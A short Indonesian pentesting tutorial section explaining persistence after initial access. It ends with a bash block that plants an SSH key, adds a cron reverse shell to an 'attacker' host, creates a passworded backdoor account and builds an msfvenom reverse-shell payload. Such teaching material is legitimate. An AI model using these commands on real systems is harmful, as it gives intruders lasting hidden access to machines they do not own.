# Persistence
Persistence adalah mekanisme untuk mempertahankan akses ke dalam sistem setelah foothold berhasil diperoleh. Dalam konteks pentesting, persistence digunakan untuk menunjukkan bahwa jika penyerang mendapatkan akses awal, mereka dapat menciptakan jalur masuk yang bertahan meskipun service direstart atau password diganti. Teknik persistence mencakup penanaman SSH key, modifikasi cron, penyisipan backdoor, penambahan akun baru, atau memanfaatkan layanan sistem yang berjalan otomatis.
Pendekatan ini harus dilakukan secara hati-hati agar tidak mengubah sistem secara destruktif. Tujuan persistence bukan untuk merusak, tetapi untuk mendemonstrasikan bahwa tanpa mitigasi yang tepat, serangan dapat berlanjut dalam jangka panjang dan sulit dideteksi.
“`bash
mkdir -p ~/.ssh
echo “ssh-rsa AAAA…” >> ~/.ssh/authorized_keys
crontab -e
echo “* * * * * /bin/bash -c ‘bash -i >& /dev/tcp/attacker/4444 0>&1′” >> /etc/crontab
useradd backdoor -m -s /bin/bash
echo “backdoor:password” | chpasswd
systemctl enable <service>
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f elf > backdoor.elf
“`
